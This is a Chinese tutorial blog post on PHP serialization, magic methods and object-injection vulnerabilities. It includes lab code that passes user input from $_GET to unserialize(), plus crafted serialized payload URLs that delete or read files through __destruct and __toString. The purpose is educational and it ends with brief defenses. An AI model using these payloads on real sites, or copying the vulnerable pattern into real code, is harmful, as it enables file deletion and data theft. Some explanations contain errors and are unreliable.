weixin_40950781
weixin_40950781

PHP序列化与反序列化

PHP序列化与反序列化

  • 0x00 前言
  • 0x01 PHP类与对象
  • 0x02 PHP Magic 方法
  • 0x03 PHP 对象序列化
  • 0x04 PHP对象反序列化
  • 0x05 PHP反序列化漏洞/PHP对象注入
    • 1)__destruct的运用实例
    • 2)加入反序列化的实例
    • 3)__toString()进行反序列化
      • 1.反序列化实例:
      • 2.用反序列化调用logFile类
  • 0x06 总结
  • 0x07 漏洞前提
  • 0x08 防御

0x00 前言

在了解PHP序列化和反序列化,之前需要对PHP的类与对象、魔法方法等有所了解,此外PHP对象注入漏洞,作为一种极为

常见却很难被利用的漏洞,也是由于PHP的序列化与反序列化早成的

0x01 PHP类与对象

不论在哪种编程语言中,类与对象的概念都不会被绕过,它是面向对象编程的基础知识,也是必备知识。

	
	class animal {
		public $name = 'dahuang';//define a virable
		public function sleep(){//define a simpe method
			echo $this->name . " is sleeping...\n";
		}
	}
	$dog = new animal();
	$dog->sleep();
	?>

PHP序列化与反序列化_第1张图片
上述简单的代码中,定义了一个animal类,在animal类中定义了一个$ name变量和一个sleep方法;然后对animal类实例化,创建一个dog对象,通果dog对象调用sleep方法,输出。

0x02 PHP Magic 方法

PHP类中一般会包含一些特殊的函数叫做magic函数,这些函数以双斜划线开始,他们的主要作用是在某些情况下,自动调用,以保证程序的健壮性,但也是由于这些方法的自动调用,使得程序在一些情况下存在漏洞。

PHP常见的magic方法:

方法名 触发点
__construct 在创建对象时候初始化对象,一般用于对变量赋初值
__destruct 和构造函数相反,在对象不再被使用时(将所有该对象的引用设为null)或者程序退出时自动调用
__toString 当一个对象被当作一个字符串被调用,把类当作字符串使用时触发,返回值需要为字符串
__wakeup() 使用unserialize时触发,反序列化恢复对象之前调用该方法
__sleep() 使用serialize时触发 ,在对象被序列化前自动调用,该函数需要返回以类成员变量名作为元素的数组(该数组里的元素会影响类成员变量是否被序列化。只有出现在该数组元素里的类成员变量才会被序列化)
__destruct() 对象被销毁时触发
__call() 在对象上下文中调用不可访问的方法时触发,即当调用对象中不存在的方法会自动调用该方法
__callStatic() 在静态上下文中调用不可访问的方法时触发
__get() 用于从不可访问的属性读取数据,即在调用私有属性的时候会自动执行
__set() 用于将数据写入不可访问的属性
__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发
__invoke() 当脚本尝试将对象调用为函数时触发

实例:


	class animal {
		public $name = 'dahuang';//define a virable
		public function sleep(){//define a simpe method
			echo $this->name . " is sleeping...\n";
		}
		public function __construct(){
			echo "the method:__construct is called\n";
		}
		public function __destruct(){
			echo "the method:__destruct is called\n";
		}
		public function __toString(){
			return "the method:__toString is called\n";
		}
	}
	$dog = new animal();
	$dog->sleep();
	echo $dog;
	?>

输出:
PHP序列化与反序列化_第2张图片
分析输出结果:

1、当通过new对类进行实例化时,首先调用__construct()构析函数,创建dog对象;

2、让后通过dog对象调用sleep()方法,触发sleep,在进行$dog->sleep();时, $ dog备档最字符串,__toString()被调用;

3、echo $dog使得脚本结束,调用__destruct函数。

0x03 PHP 对象序列化

在PHP网站中的定义:

所有PHP里面的值都是可以使用函数serialize()来返回一个包含字节流的字符串表示。 unserialize()函数能够重新把字符串

变回PHP原来的值。序列化一个对象将会保存对象的所有变量,但不会保存对象的方法,只会保存类的名字。

简单的理解序列化就是把一个类的实例变成一个字符串;

简单的理解反序列化就是把一个特殊的字符串转换成一个实例。

**那么为什么要有序列化这种机制存在呢?或者说序列化有什么作用呢?**

因为在传递变量的过程中,有可能遇到变量值要跨脚本文件传递的过程。试想,如果一个脚

本想要调用之前一个脚本的变量,但是前一个脚本已经执行完毕,所有的变量和内容都已经

释放掉了,我们要如何操作,才能引用前一个脚本的变量呢?难道要前一个脚本不断的循环

等待后面脚本的调用,显然这是不现实的。serialize和unserialize(即序列化和反序列

化)就是用来解决这一问题的。serialize可以将变量转换为字符串并且在变换中可以保存当

前变量的值;unserialize则可以将serialize生成的字符串转换为变量。

现在,我们将0x02中的dog对象进行序列化,即将最后一行代码:echo $dog;改

为echo serialize( $dog);

输出结果:高亮部分即为序列化的dog对象

PHP序列化与反序列化_第3张图片
序列化后的字符串格式如下:

O:6:"animal":1:{s:4:"name";s:7:"dahuang";}
对象类型:长度:"名字":类中变量的个数:{类型:长度:"名字";类型:长度:"值";......}

序列化格式中的字母含义:

a - array                  b - boolean  
d - double                 i - integer
o - common object          r - reference
s - string                 C - custom object
O - class                  N - null
R - pointer reference      U - unicode string

下面,我们再来探究一个小问题,到我们的变量受到不同修饰符修饰时,会不会有

不同的结果,以animal类中的name变量为例:

1.当name受到public修饰时:private $name = ‘dahuang’;

name占用四个字节PHP序列化与反序列化_第4张图片

2.当name受到private修饰时:private $name = ‘dahuang’;

类名加上变量名占12个字节,比正常多了两个字节
在这里插入图片描述
3.当name受到protected修饰时:protected $name = ‘dahuang’;
*name占用七个字节
PHP序列化与反序列化_第5张图片
通过对比发现,在受保护的成员前都多了两个字节,受保护的成员在序列化时规则:

  1. 受private修饰的私有成员,序列化时: \00 [私有成员所在类名] \00 [私有成员]
  2. 受protected修饰的成员,序列化时:\00 * \00 [成员]

其中,"\00"代表ASCII为0的值,即空字节," * " 必不可少。

0x04 PHP对象反序列化

在说明PHP对象反序列化之前,我们来看一下,在PHP的序列化与反序列化过程中

__sleep()、__wakeup()的调用过程,还是以上面的animal类为例:

对上面的代码进行简单修改

	
	class animal {
		public $name = 'dahuang';//define a virable
		public $age = '20';
		public function eat(){//define a simpe method
			echo $this->name . " is eatting...\n";
		}
		public function __construct(){
			echo "the method:__construct is called\n";
		}
		public function __destruct(){
			echo "the method:__destruct is called\n";
		}
		public function __toString(){
			return "the method:__toString is called\n";
		}
		public function __wakeup(){
			echo "the method:__wakeup is called\n";
		}
		public function __sleep(){
			echo "the method:__sleep is called\n";
			return array('name','age');
		}
	}
	$dog = new animal();//对类进行实例化时,自动调用__construct()
	echo serialize($dog)."\n";
	$serializedDog = serialize($dog);//对dog对象进行序列化时,自动调用__sleep()
	echo $serializedDog . "\n";//echo 序列化的dog对象
	$dog->eat();//dog对象调用eat()方法
				//程序结束,调用__destruct()
	?>

输出结果:
PHP序列化与反序列化_第6张图片
PHP的几个魔法函数,在进行序列化的过程中的调用:

1、当不进行序列化时: 在进行类的实例化时,自动调用__construct();在输出对象时,自动调用

__toString();在程序结束时,自动调用__destruct();__sleep()与__wakeup()均与序列化与反序列化

有关,在此过程不被调用。

2、当进行序列化时: 在进行类的实例化时,自动调用__construct();在对创建的dog对象进行序列化

时,自动调用__sleep();echo $serializedDog,输出序列化的dog对象,**在此不再调用

_toString()**;dog兑现调用eat()方法,然后程序结束,调用__destruct().

3、在整个过程中,__construct()总是在程序的开始调用,__destruct()总是在程序的结束调用,这很

简单,因为,对所有的变量的初始化总是在程序的开始,释放变量总是在程序结束。

现在,在上面的基础上,对序列化的dog对象进行反序列化:

修改代码、如下:

	
	class animal {
		public $name = 'dahuang';//define a virable
		public $age = '20';
		public function eat(){//define a simpe method
			echo $this->name . " is eatting...\n";
		}
		public function __construct(){
			echo "the method:__construct is called\n";
		}
		public function __destruct(){
			echo "the method:__destruct is called\n";
		}
		public function __toString(){
			return "the method:__toString is called\n";
		}
		public function __wakeup(){
			echo "the method:__wakeup is called\n";
		}
		public function __sleep(){
			echo "the method:__sleep is called\n";
			return array('name','age');
		}
	}
	$dog = new animal();//对类进行实例化时,自动调用__construct()
	$serializedDog = serialize($dog);//对dog对象进行序列化时,自动调用__sleep()
	echo $serializedDog . "\n";//echo 序列化的dog对象
	
	$newDog = unserialize($serializedDog);//反序列化已经被序列化的dog对象,自动调用__wakeup()
	var_dump($newDog);//输出反序列化的结果
	$newDog->eat();//dog对象调用eat()方法
				   //程序结束,调用__destruct()
	?>

分析一下,在进行序列化与反序列化的过程中,几个魔法函数的调用过程:

首先,在对animal类进行实例化时,自动调用__construct()对变量进行初始化;然后通过serialize()方

法对dog对象进行序列化,自动调用__sleep();输出序列化的dog对象;之后,通过unserialize()方法

对序列化的dog对象进行反序列化,自动调用__wakeup()方法;输出反序列化的结果,可以看到被序

列化的dog对象得到了还原;然后通过新的newDog对象调用eat()方法,程序结束,自动调用

__destruct()方法,注意这里的__construct()被调用了两次,这是因为在整个过程中产生了两个对象

dog和newDog,在程序结束需要分写释放。

0x05 PHP反序列化漏洞/PHP对象注入

我们已经认识到了PHP的序列化与反序列化过程,但是如何利用这些漏洞呢?这取决与应用程序、可

用的类和magic方法,序列化对象包含攻击者控制的对象值。在利用反序列化漏洞时,第一步就

是在web应用程序寻找定义的__wakeup()和__sleep()方法,通过上面的讲述可以知道这两个magic方

法只有在进行序列化和反序列化时才会被调用,通过触发这些方法,利用反序列化漏洞。

1)__destruct的运用实例

例如,我们找到一个类用于临时将日志存储在某个文件,当__destruct()被调用时,删除日志文件。

saveLog.php:

	 	
	class logFile{
		public $logname = "error.log";//define the name of log
		public function saveLog($text){//define the method to write the contents to a logfile
			echo "Log same data: " . $text . "
";
			file_put_contents($this->logname, $text . PHP_EOL, FILE_APPEND);
		}
		public function __destruct(){//delete the logfile when __destruct is called
			echo "the method:__destruct is called
";
			unlink(dirname(__FILE__) . DIRECTORY_SEPARATOR . $this->logname);//delete the logfile
			if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . $this->logname)){//if the file has been deleted ,echo the log
				echo "the method:__destruct is called and " . $this->logname ." has been deleted
";
			}		
		}
	}

deleteLog.php

	 
	include 'saveLog.php'; //import files
	$obj = new logFile(); //create a new object
	$obj->logname = 'somefile.log';//assignment the variable
	$obj->saveLog('this is a test file');//call the method to save some contents

首先,注释掉saveLog.php中的unlink()方法看,是否能保存,将两个文件上传至服务器,访问
deletLog.php:可以看到由于unlink()被注释掉了,保存的日志文件并没有被删除;但是输出“the method:__destruct is called”,__destruct()方法已经调用

PHP序列化与反序列化_第7张图片
PHP序列化与反序列化_第8张图片
去掉注释看一下,真正的效果:在deleteLog.php中的__destruct()添加了判断函数,所以当文件被删除后弹出日志;文件被删除。
PHP序列化与反序列化_第9张图片

2)加入反序列化的实例

对1中的saveLog.php进行优化:
saveLog.php:

	 	
	class logFile{
		public $logname = "error.log";//define the name of log
		public function saveLog($text){//define the method to write the contents to a logfile
			echo "Log same data: " . $text . "
";
			file_put_contents($this->logname, $text . PHP_EOL, FILE_APPEND);
		}
		public function __destruct(){//delete the logfile when __destruct is called
			echo "the method:__destruct is called
";
			if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . $this->logname)){//if the file has been deleted ,echo the log
				echo "the method:__destruct is called and " . $this->logname ." has been deleted
";
			}else{
				unlink(dirname(__FILE__) . DIRECTORY_SEPARATOR . $this->logname);//delete the logfile
			}			
		}
	}

创建测试文件testPHP.php:

	 
	echo "this is a test file";
	?>

创建序列化脚本serialize.php

	 
	include 'saveLog.php';
	$obj = new logFile();
	$obj->logname = "testPHP.php";
	echo serialize($obj)."
";

创建反序列化脚本unserialize.php

	 
	include 'saveLog.php';
	$usr = unserialize($_GET['user_serialized']);//用户可控
	var_dump($usr);
	echo "
";

测试:
1.让问testPHP.php进行测试:
PHP序列化与反序列化_第10张图片
2.访问serialize.php:

获得序列化的字符串:O:7:“logFile”:1:{s:7:“logname”;s:11:“testPHP.php”;}

并且原来的测试文件testPHP.php已经通过自动调用__destruct()被删除。
PHP序列化与反序列化_第11张图片
3.访问testPHP.php:文件已经在访问serialize.php时被删除;
PHP序列化与反序列化_第12张图片
4.通过反序列化恢复字符串,访问:恢复数据结构

http://192.168.15.83/unserialize.php/?user_serialized=O:7:"logFile":1:{s:7:"logname";s:11:"testPHP.php";}

PHP序列化与反序列化_第13张图片
此时,testPHP.php文件已经被删除,因为在脚本运行结束时,__destruct()方法,然而我们可以通过

给定不同的字符串控制logFile类的变量。这就是PHP反序列化漏洞的名称由来,PHP反序列化漏洞的
条件:
1.unserialize函数的变量可控(本例中:unserialize($_GET[‘USER_serialized’]):USER_serialized是用户设定);
2.php文件中存在可利用的类,类中有魔术方法(本例中:__destruct());

3)__toString()进行反序列化

1.反序列化实例:

对0x04中代码进行修改:

    
   class animal {
   	public $name = 'dahuang';//define a virable
   	public $age = '20';
   	public function eat(){//define a simpe method
   		echo $this->name . " is eatting...
";
   	}
   	public function __construct(){
   		echo "the method:__construct is called
";
   	}
   	public function __destruct(){
   		echo "the method:__destruct is called
";
   	}
   	public function __toString(){
   		return "the method:__toString is called
";
   	}
   	public function __wakeup(){
   		echo "the method:__wakeup is called
";
   	}
   	public function __sleep(){
   		echo "the method:__sleep is called
";
   		return array('name','age');
   	}
   }
   $usr = unserialize($_GET['USER_serialized']);
   $usr->eat();
   var_dump($usr);//echo the result
   echo "
";
   ?>

输出结果:

payload:http://192.168.15.83/test1.php/?USER_serialized=O:6:"animal":2:{s:4:"name";s:7:"dahuang";s:3:"age";s:2:"20";}

PHP序列化与反序列化_第14张图片

2.用反序列化调用logFile类

1.创建测试文件demo.txt
PHP序列化与反序列化_第15张图片
2.重新编写类脚本:logfile.php

    	         
       class LogFile  
       {                 
           public $filename = 'error.log';  //define the name of log      
           public function LogData($text)  //define a method to save log
           {  
               echo 'Log some data: ' . $text . '
';  
               file_put_contents($this->filename, $text, FILE_APPEND);  
           }       
           public function __destruct()  //define a method to delete log
           {  
               echo 'the method:__destruct is called and the file :"' . $this->filename . '" is deleteed. 
';  
               unlink(dirname(__FILE__) . '/' . $this->filename);  
           }  
       }    
   ?>

3.反序列testunserialize.php

         
//import files here      
class FileClass  
{    
   public $filename = 'error.log';  //the name of file
   public function __toString()  //when the object read as a string , this method will be called
   {  
   return file_get_contents($this->filename);  
   }  
} 
$obj = unserialize($_GET['usr_serialized']);// implement user can control
echo $obj;  //echo the __toString  
?>

4.测试文件:testfile.php

  
include 'testunserialize.php';  
$fileobj = new FileClass();  
$fileobj->filename = '1.txt';  
echo serialize($fileobj);    
?>

5.测试:

5.1直接访问测试文件demo.txt

PHP序列化与反序列化_第16张图片
5.2 访问测试文件获取序列化字符串:O:9:“FileClass”:1:{s:8:“filename”;s:5:“1.txt”;}
PHP序列化与反序列化_第17张图片
5.3 漏洞利用,访问反序列化测试文件读取文件内容:成功读取文件内容,漏洞利用成功
PHP序列化与反序列化_第18张图片

0x06 总结

在上面的实验过程介绍了PHP常见的几个magic函数的调用顺序和调用方法,在进行反序列化漏洞测试的过程中主要利用到了__destruct和__tostring两个magic函数。也可以使用其他magic函数:如果对象将调用一个不存在的函数__call将被调用;如果对象试图访问不存在的类变量__get和__set将被调用。但是利用这种漏洞并不局限于magic函数,在普通的函数上也可以采取相同的思路。例如User类可能定义一个get方法来查找和打印一些用户数据,但是其他类可能定义一个从数据库获取数据的get方法,这从而会导致SQL注入漏洞。set或write方法会将数据写入任意文件,可以利用它获得远程代码执行。唯一的技术问题是注入点可用的类,但是一些框架或脚本具有自动加载的功能。最大的问题在于人:理解应用程序以能够利用这种类型的漏洞,因为它可能需要大量的时间来阅读和理解代码。

0x07 漏洞前提

1.unserialize函数的变量可控(本例中:unserialize($_GET[‘USER_serialized’]):USER_serialized是用户设定);

2.php文件中存在可利用的类,类中有魔术方法(本例中:__destruct());

0x08 防御

1.对参数进行处理;

2.使用更加安全的函数。

参考:
https://paper.seebug.org/680/
https://blog.csdn.net/nzjdsds/article/details/82703639
https://cloud.tencent.com/developer/news/88891
https://www.jianshu.com/p/1d2c65601d2a
http://www.codeceo.com/article/php-object-injection.html
https://blog.csdn.net/fly_hps/article/details/82734823
https://www.freebuf.com/news/172507.html
https://www.freebuf.com/articles/web/167721.html
https://www.cnblogs.com/wfzWebSecuity/p/11156279.html

你可能感兴趣的:(常见漏洞)

  • Long类型前后端数据不一致 igotyback 前端
    响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题,尤其是当后端使用Java的Long类型(64位)与前端JavaScript的Number类型(最大安全整数为2^53-1,即16位)进行数据交互时,很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
  • 消息中间件有哪些常见类型 xmh-sxh-1314 java
    消息中间件根据其设计理念和用途,可以大致分为以下几种常见类型:点对点消息队列(Point-to-PointMessagingQueues):在这种模型中,消息被发送到特定的队列中,消费者从队列中取出并处理消息。队列中的消息只能被一个消费者消费,消费后即被删除。常见的实现包括IBM的MQSeries、RabbitMQ的部分使用场景等。适用于任务分发、负载均衡等场景。发布/订阅消息模型(Pub/Sub
  • ArcGIS栅格计算器常见公式(赋值、0和空值的转换、补充栅格空值) 研学随笔 arcgis经验分享
    我们在使用ArcGIS时通常经常用到栅格计算器,今天主要给大家介绍我日常中经常用到的几个公式,供大家参考学习。将特定值(-9999)赋值为0,例如-9999.Con("raster"==-9999,0,"raster")2.给空值赋予特定的值(如0)Con(IsNull("raster"),0,"raster")3.将特定的栅格值(如1)赋值为空值,其他保留原值SetNull("raster"==
  • git常用命令笔记 咩酱-小羊 git笔记
    ###用习惯了idea总是不记得git的一些常见命令,需要用到的时候总是担心旁边站了人~~~记个笔记@_@,告诉自己看笔记不丢人初始化初始化一个新的Git仓库gitinit配置配置用户信息gitconfig--globaluser.name"YourName"gitconfig--globaluser.email"[email protected]"基本操作克隆远程仓库gitclone查看
  • Python中os.environ基本介绍及使用方法 鹤冲天Pro #Pythonpython服务器开发语言
    文章目录python中os.environos.environ简介os.environ进行环境变量的增删改查python中os.environ的使用详解1.简介2.key字段详解2.1常见key字段3.os.environ.get()用法4.环境变量的增删改查和判断是否存在4.1新增环境变量4.2更新环境变量4.3获取环境变量4.4删除环境变量4.5判断环境变量是否存在python中os.envi
  • 使用Apify加载Twitter消息以进行微调的完整指南 nseejrukjhad twittereasyui前端python
    #使用Apify加载Twitter消息以进行微调的完整指南##引言在自然语言处理领域,微调模型以适应特定任务是提升模型性能的常见方法。本文将介绍如何使用Apify从Twitter导出聊天信息,以便进一步进行微调。##主要内容###使用Apify导出推文首先,我们需要从Twitter导出推文。Apify可以帮助我们做到这一点。通过Apify的强大功能,我们可以批量抓取和导出数据,适用于各类应用场景。
  • 【PG】常见数据库、表属性设置 江无羡 数据库
    PG的常见属性配置方法数据库复制、备份相关表的复制标识单表操作批量表操作链接数据库复制、备份相关表的复制标识单表操作通过ALTER语句单独更改一张表的复制标识。ALTERTABLE[tablename]REPLICAIDENTITYFULL;批量表操作通过代码块的方式,对某个schema中的所有表一起更新其复制标识。SELECTtablename,CASErelreplidentWHEN'd'TH
  • 18、架构-可观测性之聚合度量 大树~~ 架构javapython后端架构
    聚合度量聚合度量是指对系统运行时产生的各种指标数据进行收集、聚合和分析,以了解系统的健康状况和性能表现。聚合度量是可观测性的关键组成部分,通过对度量数据的分析,可以及时发现系统中的异常和瓶颈。以下是对聚合度量各个方面的详细解析,并结合具体的数据案例和技术支撑。指标收集收集系统运行时产生的各种指标数据是聚合度量的基础。常见的指标包括CPU使用率、内存使用率、请求处理时间、请求数、错误率等。以下是指标
  • 【Git】常见命令(仅笔记) 好想有猫猫 GitLinux学习笔记git笔记elasticsearchlinuxc++
    文章目录创建/初始化本地仓库添加本地仓库配置项提交文件查看仓库状态回退仓库查看日志分支删除文件暂存工作区代码远程仓库使用`.gitigore`文件让git不追踪一些文件标签创建/初始化本地仓库gitinit添加本地仓库配置项gitconfig-l#以列表形式显示配置项gitconfiguser.name"ljh"#配置user.namegitconfiguser.email"[email protected]
  • SpringBlade dict-biz/list 接口 SQL 注入漏洞 文章永久免费只为良心 oracle数据库
    SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中,如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询(PreparedSta
  • 1分钟解决 -bash: mvn: command not found,在Centos 7中安装Maven Energet!c 开发语言
    1分钟解决-bash:mvn:commandnotfound,在Centos7中安装Maven检查Java环境1下载Maven2解压Maven3配置环境变量4验证安装5常见问题与注意事项6总结检查Java环境Maven依赖Java环境,请确保系统已经安装了Java并配置了环境变量。可以通过以下命令检查:java-version如果未安装,请先安装Java。1下载Maven从官网下载:前往Apach
  • 作业是家庭关系的枢纽 潘海松
    回想一下,当孩子做作业的时候,我们不断地在和孩子聊天、沟通,互相提出一些要求,也不可避免地,会产生分歧。举个最常见的例子,我们告诉孩子:「该写作业了。」娃是什么反应?好的亲子关系,孩子会乖乖停掉手里的事马上去写作业,或者好声好气地和家长商量,能不能在半个小时(或某个时间)开始。而不如意的亲子关系,孩子听到这句话的瞬间,就是各种不情愿,敷衍、拖延甚至于撒谎、撒泼打滚。最后,成为当天家庭里坏情绪的引爆
  • 2019-03-22 430O70Mk
    引发支原体的原因支原体感染是临床上比较常见的一种疾病,此疾病会对患者的身体造成很大的伤害,对支原体感染患者的日常生活也会带来极大的影响,那么诱发支原体感染的原因是什么呢?肺炎支原体感染,又称支原体性肺炎,是由肺炎支原体引起的急性间质性肺炎。主要通过呼吸道传播,健康人吸入患者咳嗽,打喷嚏时喷出的口、鼻分泌物而感染。支原体为动物多种疾病的致病体,而其中只有肺炎支原体肯定对人致病。它是由口、鼻分泌物经空
  • 简单说说关于shell中zsh和bash的选择 秋刀prince MacOS小猿们的开发日常bash
    希望文章能给到你启发和灵感~如果觉得文章对你有帮助的话,点赞+关注+收藏支持一下博主吧~阅读指南开篇说明一、基础环境说明1.1硬件环境1.2软件环境二、什么是shell、bash、zsh?2.1bash2.2zsh三、选择Bash还是Zsh?四、一些常见问题开篇说明本篇主要简单说明一下,shell中bash和zsh的区别和选择;我们经常会把这两个搞混,不知道什么时候用哪一个,以及怎么使用;一、基础
  • Python入门之Lesson2:Python基础语法 小熊同学哦 Python入门课程python开发语言算法数据结构青少年编程
    目录前言一.介绍1.变量和数据类型2.常见运算符3.输入输出4.条件语句5.循环结构二.练习三.总结前言欢迎来到《Python入门》系列博客的第二课。在上一课中,我们了解了Python的安装及运行环境的配置。在这一课中,我们将深入学习Python的基础语法,这是编写Python代码的根基。通过本节内容的学习,你将掌握变量、数据类型、运算符、输入输出、条件语句等Python编程的基础知识。一.介绍1
  • 利用python实现图片格式之间的相互转换 难得北窗高卧 python开发语言
    一、概要图片一般有多种格式,常见的图片格式包括:JPEG(.jpg或.jpeg):一种广泛使用的有损压缩格式,适用于摄影图像和网页上的图片。PNG(.png):一种无损压缩格式,支持透明度和更好的图像质量,常用于图标、图形和需要透明背景的图片。该图片是4通道的,外加一个透明通道。如截屏GIF(.gif):一种支持动画和透明度的格式,常用于简单的动画和图标。BMP(.bmp):一种无损格式,存储图像
  • 在RabbitMQ中四种常见的消息路由模式 Xwzzz_ rabbitmq分布式
    1.Fanout模式Fanout模式的交换机是扇出交换机(FanoutExchange),它会将消息广播给所有绑定到它的队列,而不考虑消息的内容或路由键。工作原理:生产者发送消息到FanoutExchange。FanoutExchange会将消息广播给所有绑定到它的队列,所有绑定的队列都会收到这条消息。消费者监听绑定的队列,处理收到的消息。特点:没有路由键:消息不需要路由键,所有绑定的队列都会接收
  • 微信母婴闲置群如何盈利赚钱 母婴优惠券群主怎么做 古楼
    宝妈闲置群群主怎么赚钱微信母婴闲置群如何盈利赚钱怎么做母婴优惠券群作为宝妈闲置群群主,你可以通过以下几种方式赚取收益:1.分享优惠券和佣金实现带货赚钱:宝妈闲置群群主带货赚钱最常见的方式就是直接做母婴优惠群群分享商品赚钱。母婴闲置群群主通过对接高省优惠券返利app这类第三方平台分享优惠券获得推广购物返利佣金赚钱。高省,含有自动云发单功能,开通云发单,宝妈闲置群群主就可以解放双手,自动分享商品优惠券
  • C++八股 Petrichorzncu 八股总结c++开发语言
    这里写目录标题C++内存管理C++的构造函数,复制构造函数,和析构函数深复制与浅复制:构造函数和析构函数哪个能写成虚函数,为什么?C++数据结构内存排列结构体和类占用的内存:==虚函数和虚表的原理==虚函数虚表(Vtable)虚函数和虚表的实现细节==内存泄漏==指针的工作原理函数的传值和传址new和delete与malloc和freeC++内存区域划分C++11新特性C++常见新特性==智能指针
  • Spring Boot中实现跨域请求 BABA8891 springboot后端java
    在SpringBoot中实现跨域请求(CORS,Cross-OriginResourceSharing)可以通过多种方式,以下是几种常见的方法:1.使用@CrossOrigin注解在SpringBoot中,你可以在控制器或者具体的请求处理方法上使用@CrossOrigin注解来允许跨域请求。在控制器上应用:importorg.springframework.web.bind.annotation.
  • 00. 这里整理了最全的爬虫框架(Java + Python) 有一只柴犬 爬虫系列爬虫javapython
    目录1、前言2、什么是网络爬虫3、常见的爬虫框架3.1、java框架3.1.1、WebMagic3.1.2、Jsoup3.1.3、HttpClient3.1.4、Crawler4j3.1.5、HtmlUnit3.1.6、Selenium3.2、Python框架3.2.1、Scrapy3.2.2、BeautifulSoup+Requests3.2.3、Selenium3.2.4、PyQuery3.2
  • 常见的 JVM 调优方法有哪些? 爪哇天下 jvm
    常见的JVM调优方法有哪些?可以具体到调整哪个参数,调成什么值?对年轻代的EdenSurvivor的比例进行配置-XX:SurvivorRatio=8:表示设置2个Survivor区:1个Eden区的大小比值为2:8,这意味着Survivor区占整个年轻代的1/5,这个参数默认为8如果经常性的SurvivorTo放不下YGC的剩余的对象时候,可以适当的调整比例常用的CMS收集器:设置回收阈值,需要
  • 孩子强迫症,厌学叛逆,家长怎么办? 扶禾心理
    01最近,我们的公众号后台收到了很多家长的私信,很多家长说,孩子在进入青春期后,不知不觉竟然有强迫行为,特别容易钻牛角尖,沉迷网络,厌学,顶撞父母。他们为此很苦恼,不知道怎么办。强迫症正在成为儿童和青少年中常见的精神障碍之一。强迫症是一种长期逐步形成的心理问题,是一种慢性、难治性心理疾病。在这里,我们分享一些咨询实践及思路供家长参考,希望对更多的家长和孩子有帮助。一位家长私信我们说,她儿子14岁,
  • 【Java】已解决:java.util.concurrent.CompletionException 屿小夏 java开发语言
    文章目录一、分析问题背景出现问题的场景代码片段二、可能出错的原因三、错误代码示例四、正确代码示例五、注意事项已解决:java.util.concurrent.CompletionException一、分析问题背景在Java并发编程中,java.util.concurrent.CompletionException是一种常见的运行时异常,通常在使用CompletableFuture进行异步计算时出现
  • 【加密算法基础——对称加密和非对称加密】 XWWW668899 网络安全服务器笔记
    对称加密与非对称加密对称加密和非对称加密是两种基本的加密方法,各自有不同的特点和用途。以下是详细比较:1.对称加密特点密钥:使用相同的密钥进行加密和解密。发送方和接收方必须共享这个密钥。速度:通常速度较快,适合处理大量数据。实现:算法相对简单,计算效率高。常见算法AES(高级加密标准)DES(数据加密标准)3DES(三重数据加密标准)RC4(流密码)应用场景文件加密磁盘加密传输大量数据时的加密2.
  • [实践应用] 深度学习之模型性能评估指标 YuanDaima2048 深度学习工具使用深度学习人工智能损失函数性能评估pytorchpython机器学习
    文章总览:YuanDaiMa2048博客文章总览深度学习之模型性能评估指标分类任务回归任务排序任务聚类任务生成任务其他介绍在机器学习和深度学习领域,评估模型性能是一项至关重要的任务。不同的学习任务需要不同的性能指标来衡量模型的有效性。以下是对一些常见任务及其相应的性能评估指标的详细解释和总结。分类任务分类任务是指模型需要将输入数据分配到预定义的类别或标签中。以下是分类任务中常用的性能指标:准确率(
  • [实践应用] 深度学习之优化器 YuanDaima2048 深度学习工具使用pytorch深度学习人工智能机器学习python优化器
    文章总览:YuanDaiMa2048博客文章总览深度学习之优化器1.随机梯度下降(SGD)2.动量优化(Momentum)3.自适应梯度(Adagrad)4.自适应矩估计(Adam)5.RMSprop总结其他介绍在深度学习中,优化器用于更新模型的参数,以最小化损失函数。常见的优化函数有很多种,下面是几种主流的优化器及其特点、原理和PyTorch实现:1.随机梯度下降(SGD)原理:随机梯度下降通过
  • [实验室服务器使用]使用VSCode、PyCharm、MobaXterm和CMD连接远程服务器 YuanDaima2048 工具使用服务器vscodepycharmcmd代理模式机器学习实验
    文章总览:YuanDaiMa2048博客文章总览实验室服务器使用:使用VSCode、PyCharm、MobaXterm和CMD连接远程服务器在进行实验室工作时,远程连接服务器是常见的需求之一。本篇文章根据个人的一些使用介绍使用不同工具连接服务器的方法,并提供优化功能,使服务器能够使用本机代理的说明。准备服务器账号信息Host(主机):10.XXX.XX.XXXPort(端口):[SSHPort]U
  • 3.增删改查--连接查询 问女何所忆
    关系型数据库的一个特点就是,多张表之间存在关系,以致于我们可以连接多张表进行查询操作,所以连接查询会是关系型数据库中最常见的操作。连接查询主要分为三种,交叉连接、内连接和外连接,我们一个个说。1、交叉连接交叉连接其实连接查询的第一个阶段,它简单表现为两张表的笛卡尔积形式,具体例子:如果你没学过数学中的笛卡尔积概念,你可以这样简单的理解这里的交叉连接:两张表的交叉连接就是一个连接合并的过程,T1表中
  • C++常见知识掌握 nfgo c++开发语言
    1.Linux软件开发、调试与维护内核与系统结构Linux内核是操作系统的核心,负责管理硬件资源,提供系统服务,它是系统软件与硬件之间的桥梁。主要组成部分包括:进程管理:内核通过调度器分配CPU时间给各个进程,实现进程的创建、调度、终止等操作。使用进程描述符(task_struct)来存储进程信息,包括状态(就绪、运行、阻塞等)、优先级、内存映射等。内存管理:包括物理内存和虚拟内存管理。通过页表映
  • java杨辉三角 3213213333332132 java基础
    package com.algorithm; /** * @Description 杨辉三角 * @author FuJianyong * 2015-1-22上午10:10:59 */ public class YangHui { public static void main(String[] args) { //初始化二维数组长度 int[][] y
  • 《大话重构》之大布局的辛酸历史 白糖_ 重构
    《大话重构》中提到“大布局你伤不起”,如果企图重构一个陈旧的大型系统是有非常大的风险,重构不是想象中那么简单。我目前所在公司正好对产品做了一次“大布局重构”,下面我就分享这个“大布局”项目经验给大家。   背景         公司专注于企业级管理产品软件,企业有大中小之分,在2000年初公司用JSP/Servlet开发了一套针对中
